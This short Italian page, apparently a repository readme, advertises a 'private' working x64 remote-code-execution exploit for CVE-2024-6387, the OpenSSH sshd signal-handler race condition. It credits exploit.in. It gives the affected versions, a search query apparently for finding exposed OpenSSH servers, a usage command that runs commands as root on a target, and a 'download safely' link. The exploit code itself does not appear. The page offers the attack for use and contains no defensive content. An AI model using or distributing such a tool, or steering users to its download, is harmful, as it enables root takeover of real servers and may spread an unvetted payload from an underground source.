
Exploit privato x64 RCE per CVE-2024-6387 [02.07.2024] da exploit.in
Exploit RCE x64 privato (Python) per CVE-2024-6387 [02.07.2024] da exploit.in
Il repository fornisce una variante funzionante dell'exploit della vulnerabilità CVE-2024-6387 con supporto per shell attiva in tempo reale, multithreading, inserimento di target da file e output a colori.
Un exploit per CVE-2024-6387, che sfrutta una condizione di gara nel gestore di segnali del server OpenSSH (sshd) su sistemi Linux basati su glibc. La vulnerabilità consente l'esecuzione remota di codice come root a causa di funzioni asincrone non sicure per i segnali chiamate nel gestore SIGALRM.
L'exploit prende di mira la condizione di gara del gestore SIGALRM in sshd di OpenSSH, che chiama funzioni asincrone non sicure per i segnali. Questo può essere sfruttato per ottenere l'esecuzione remota di codice come root.
app:"OpenSSH"
OpenSSH 8.5p1 to 9.8p1
Per eseguire l'exploit è necessario Python 3.9. Esegui:
python exploit.py -h 10.10.10.10 -c 'id'
Scarica qui (in modo sicuro!)